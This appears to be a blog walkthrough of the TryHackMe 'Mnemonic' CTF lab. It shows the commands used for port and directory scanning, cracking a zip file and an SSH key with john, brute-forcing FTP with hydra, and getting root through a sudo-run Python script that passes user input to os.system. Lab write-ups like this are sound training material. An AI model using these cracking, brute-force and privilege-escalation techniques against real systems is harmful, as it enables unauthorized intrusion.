narancs's blog

TryHackMe – Mnemonic walkthrough

TryHackMe Mnemonic CTF room logo

Introduction

Mnemonic is a medium difficulty room on TryHackMe. It involves many different things. During the room, we need to crack the password for a zip file and an ssh key file. We also need to brute-force the password for FTP, and find a vulnerability in a short Python code.

Task 1 - Mnemonic

The first task does not have any questions that need to be answered. It only shows the following text with a Youtube link:

Hit me!

You need 1 things : hurry up

 
 
                                       https://www.youtube.com/watch?v=pBSR3DyobIY

At first, it did not seem to be useful. The text doesn’t really help much and the link points to a Youtube video that is private, and cannot be accessed.

However, I was able to find the video on the Wayback Machine website using a snapshot that was taken on Oct 29th, 2020. It is a short clip from the movie “Johnny Mnemonic”. It was posted by Matteo Bonanno on Dec 16, 2015, and the title of the video is “JOHNNY MNEMONIC | Hit me!”.

I also searched the URL of the video in Google, and found a GitHub repository: https://github.com/MustafaTanguner/Mnemonic

The URL is in the README file of the repo.

Task 2 - Enumerate

How many ports are open?

I scanned all ports on the target with nmap.

				
					nmap -p- 10.10.28.195
				
			

3 ports were open: 21, 80 and 1337.

What is the ssh port number?

I ran nmap again with -A flag to perform version detection and script scanning.

From the scan results we can see that the following services were running on the target:

  • FTP on port 21
  • HTTP on port 80
  • SSH on port 1337

And we can also see that robots.txt contains a disallowed entry: /webmasters/*

What is the name of the secret file?

At this point I did not have any possible usernames or passwords for FTP / SSH, so I started enumerating the web server. I ran directory discovering on /webmasters/ first.

				
					gobuster dir --url http://10.10.28.195/webmasters -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 32
				
			

2 sub-directories were found

  • /admin
  • /backups

Since the question is ‘the name of the secret file’, I started enumerating common file extensions like: txt, log, sql, bkp, bak, zip, tar, tgz. Eventually I found the file in /webmasters/backups with .zip extension.

				
					gobuster dir --url http://10.10.28.195/webmasters/backups -w /usr/share/wordlists/dirb/common.txt -x zip -t 32
				
			

Task 3 - Credentials

What is the ftp username?

I downloaded the file to unzip it, but it was password protected. Then, I used zip2john to generate a hash of the file and cracked the password with john.

				
					zip2john ***HIDDEN***.zip > zip.hash
john -w=/usr/share/wordlists/rockyou.txt zip.hash
				
			

I unzipped the file, and there was a note inside, that revealed the FTP username.

				
					@vill
James new ftp username: ***HIDDEN***
we have to work hard
				
			

What is the ftp password?

To get the password, I used hydra to brute-force it.

				
					hydra -l ***HIDDEN*** -P /usr/share/wordlists/rockyou.txt 10.10.136.218 ftp -t 32
				
			

What is the ssh username?

I logged in to the FTP server with the found credentials and checked the available files/directories.

Since there was a lot of directories on the FTP server, I decided to download everything with wget. That way I was able to check them more quickly.

				
					wget -r --user="***USERNAME***" --password="***PASSWORD***" ftp://10.10.136.218/
				
			

I found that only one of the directories contained files, the rest of them was completely empty. The data-4 directory had 2 files in it:

  • not.txt
  • id_rsa

The SSH username was in the text file.

What is the ssh password?

I tried to connect to the SSH server using the id_rsa file and the username from the text file. First the permissions on id_rsa key file has to be changed to 600.

				
					chmod 600 id_rsa
ssh -i id_rsa ***HIDDEN***@10.10.136.218 -p 1337
				
			

The SSH key had a password. I used ssh2john to generate a hash of id_rsa, then cracked the password with john.

				
					python3 ssh2john.py id_rsa > id_rsa.hash
john -w=/usr/share/wordlists/rockyou.txt id_rsa.hash 
				
			

I tried logging in again and the password was accepted for the SSH key. Then the password for the user was required as well, however it was the same as for the SSH key.

What is the condor password?

After login, a broadcast message was sent from root that “Unauthorized access was detected.”. Few minutes later it sent a new message “System Blocking is starting …”. Then a 10 second countdown started, and when it reached 0 the server closed the connection. However logging in again was still possible.

In the home directory of the user I found 2 text files:

  • 6450.txt
  • noteforjames.txt

The note contained the following message:

				
					noteforjames.txt
@vill
james i found a new encryption İmage based name is Mnemonic  
I created the condor password. don't forget the beers on saturday
				
			

The other file looked like an encrypted message that was generated with the Mnemonic Cryptography tool that I discovered in task 1. However, to be able to decrypt the message, I would need to find the same image that was used for the encryption.

I checked what other users have home directories on the server.

				
					james@mnemonic:~$ ls -l /home
total 32
drwx------  2 root    root    4096 Jul 14  2020 alex
drwxr--r--  6 condor  condor  4096 Jul 14  2020 condor
drwx------ 12 ftpuser ftpuser 4096 Jul 14  2020 ftpuser
drwx------  6 james   james   4096 Jul 14  2020 james
drwx------  2 root    root    4096 Jul 14  2020 jeff
drwx------  2 root    root    4096 Jul 14  2020 john
drwx------  2 root    root    4096 Jul 14  2020 mike
drwx------  4 vill    vill    4096 Jul 14  2020 vill
james@mnemonic:~$
				
			

condor was mentioned in the note that I found, and it is the only directory that allowed read access for other users. So I listed the files in that directory, and found an interesting result:

				
					james@mnemonic:~$ ls -l /home/condor
ls: cannot access '/home/condor/'\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\''': Permission denied
ls: cannot access '/home/condor/aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw==': Permission denied
total 0
d????????? ? ? ? ?            ? 'aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw=='
d????????? ? ? ? ?            ? ''\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\'''
james@mnemonic:~$
				
			

2 directories appeared in the list. The names of those directories contained base64 encoded text.

The first encoded text was:

				
					aHR0cHM6Ly9pLnl0aW***HIDDEN*hyZXNkZWZhdWx0LmpwZw==
				
			

After decoding, it was the URL of the image that was required to decode the cyphertext generated by Mnemonic Cryptography tool. I saved the image locally to be used for the decryption.

The other encoded text:

				
					VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ==
				
			

It was actually the user flag in base64 encoded format, that is the answer for the first question in task 4.

Using the Mnemonic Crytography tool

To find the condor password, I used the Mnemonic tool found on github. It requires 2 python modules to be installed, then I was able to run the code:

				
					pip3 install colored
pip3 install opencv-python
python3 Mnemonic.py
				
			

First, it asks for the path of the image that is used for encoding/decoding (Access Code image file Path). I provided the path to the image that I saved earlier.

Then I selected the second option: DECRYPT.

Finally, it asked for the path of the file that contains the decrypted text. I copied the text from the 6450.txt file that was on the target machine and pasted it in a file on my machine. I provided the path of that file.

The decrypted text is the password for condor user, so the answer for the last question in task 3.

Task 4 - Hack the machine

user.txt

I was able to login as condor user via SSH using the password I found in the previous task. In the home directory of condor one of the directories contains the user flag in base64 encoded format. I already found this in task 3.

				
					drwxr-xr-x  2 root   root   4096 Jul 13  2020 ''\''VEhNe2E1ZjgyYT***HIDDEN***NTViZTcxYzAxfQ=='\'''
				
			

root.txt

I checked the sudo capabilities of condor user, and found that he has permission to execute a Python script as root.

				
					condor@mnemonic:~$ sudo -l
[sudo] password for condor: 
Matching Defaults entries for condor on mnemonic:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User condor may run the following commands on mnemonic:
    (ALL : ALL) /usr/bin/python3 /bin/examplecode.py
condor@mnemonic:~$
				
			

The file was only writable by root, so I checked the code for any issues that can be exploited.

The code:

				
					#!/usr/bin/python3
import os
import time
import sys
def text(): #text print 

        print("""
        ------------information systems script beta--------
        ---------------------------------------------------
        ---------------------------------------------------
        ---------------------------------------------------
        ---------------------------------------------------
        ---------------------------------------------------
        ---------------------------------------------------
        ----------------@author villwocki------------------""")
        time.sleep(2)
        print("\nRunning...")
        time.sleep(2)
        os.system(command="clear")
        main()

def main():
        info()
        while True:
                select = int(input("\nSelect:"))
                if select == 1:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="ip a")
                        print("Main Menü press '0' ")
                        print(x)
                if select == 2:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="ifconfig")
                        print(x)
                if select == 3:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="ip route show")
                        print(x)
                if select == 4:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="cat /etc/os-release")
                        print(x)
                if select == 0: 
                        time.sleep(1)
                        ex = str(input("are you sure you want to quit ? yes : "))
                        if ex == ".":
                                print(os.system(input("\nRunning....")))
                        if ex == "yes " or "y":
                                sys.exit()
                      
                if select == 5:                     #root
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(2)
                        print(".......")
                        time.sleep(2)
                        print("System rebooting....")
                        time.sleep(2)
                        x = os.system(command="shutdown now")
                        print(x)
                if select == 6:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="date")
                        print(x)


                if select == 7:
                        time.sleep(1)
                        print("\nRunning")
                        time.sleep(1)
                        x = os.system(command="rm -r /tmp/*")
                        print(x)
                      
              

       

            
def info():                         #info print function
        print("""
        #Network Connections   [1]
        #Show İfconfig         [2]
        #Show ip route         [3]
        #Show Os-release       [4]
        #Root Shell Spawn      [5]           
        #Print date            [6]
        #Exit                  [0]
        """)
def run(): # run function 
        text()
run()
				
			

I found that if I select option 0 (Exit) the code will take another input asking “are you sure you want to quit ? yes : “. If the answer to this question is . (dot), the following line will be executed:

				
					print(os.system(input("\nRunning....")))
				
			

The program will take another user input and execute it as a command, then print the output. Since we are executing the code via sudo, the command we type here will be executed as root user. I just typed bash, and received a root shell.

The root.txt file was contained in /root. It contained a text that seemed to be root flag, but it was not accepted.

				
					THM{co***HIDDEN***me}
				
			

To get the actual flag, we need to get the MD5 hash of the text between the curly brackets.

				
					root@mnemonic:~# echo -n "co***HIDDEN***me" | md5sum
2a48***HIDDEN***b0586  -
root@mnemonic:~#
				
			

Then put the hash back in between the curly brackets.

				
					THM{2a48***HIDDEN***b0586}
				
			

Summary

It was fun to play the Mnemonic room on TryHackMe. Many skills were required to root the machine, however none of the steps was too complicated. I wasted most of the time by searching for “the secret file”, because I tried many wrong file extensions before checking for .zip files.

After getting the zip file, it was easy to crack its password and unzip it. I found the FTP username in the unzipped note. Then I used hydra to brute-force the password, that was quick because the password was simple.

Among the files on the FTP server I found a note that revealed the SSH username, and an SSH key for that user as well. The SSH key was also password protected, so I cracked it with john. Then I was able to login to the target via SSH.

I found more files on the target containing useful information. There was a file that contained an encrypted message that was created by Mnemonic Cryptography tool. I also found the URL of the image that was used for the encryption, so I was able to decrypt the message. The result was the SSH password for another user.

Then I logged in with the new user and checked the user’s sudo privileges. The user had permission to execute a Python script. The script had a vulnerability which allowed me to execute any command as root. I used that vulnerability to gain root access.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x